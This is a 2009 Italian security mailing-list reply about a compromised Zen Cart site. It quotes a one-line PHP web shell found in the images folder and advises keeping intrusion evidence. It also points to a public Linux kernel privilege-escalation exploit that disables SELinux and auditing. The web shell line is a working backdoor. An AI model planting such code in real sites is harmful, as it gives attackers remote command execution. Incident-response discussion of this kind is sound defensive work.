On Mon, Aug 24, 2009 at 2:15 PM, Francesco Conti<madmoose@xxxxxxxxxxxx> wrote:
> c'era un bel file 208e4.php nella directory delle immagini di zencart e
> guardate un po' cosa conteneva (non mi pare proprio una immagine):
> <?php system($_SERVER["HTTP_SHELL"]); ?>
ottimo, bravo ad averlo trovato.
Ora, per la prossima volta, ricordati di NON CANCELLARE MAI qualcosa
che non pensi di aver messo tu sulla macchina. Tieni tutto quello che
e` stato usato per un'intrusione, puo` sempre fornire spunti validi.
Diciamo che l'ideale sarebbe spegnere la macchina seduta stante, e
neanche con lo shutdown ma con il metodo di "tirare il filo" -- anche
se cosi` ti perdi l'immagine della memoria che potrebbe comunque
contenere qualcosa di interessante.
Come nota a margine per quello che riguarda la privilege escalation su
Linux, c'e` un gioco nuovo in giro da un po' di giorni (10, per la
precisione) -- lo riporto perche` magari non tutti l'hanno visto da
full-disclosure:
http://seclists.org/fulldisclosure/2009/Aug/0190.html
"My exploit works on 2.4, 2.6, x86, x64, 4k stacks, 8k stacks,
with/without cred framework, bypasses mmap_min_addr in any public way
possible (auto-detecting which method to use). As always, while in
ring0 it provides the added convenience of disabling auditing,
SELinux, AppArmor, and all other LSM modules. If SELinux is enforcing,
it will also rewrite the SELinux code to fool userland into thinking
it remains in enforcing mode."
La mail originale contiene anche un link a youtube con la "demo"
(sempre che un exploit abbia bisogno di una demo...)
Un post un po' piu` tecnico ed aggiornato sul problema si trova sul
blog di Julien Tinnes
(http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html)
ciaps,
--
guido . zen@xxxxxxxxxxxxxxx . skype://zenmobile
|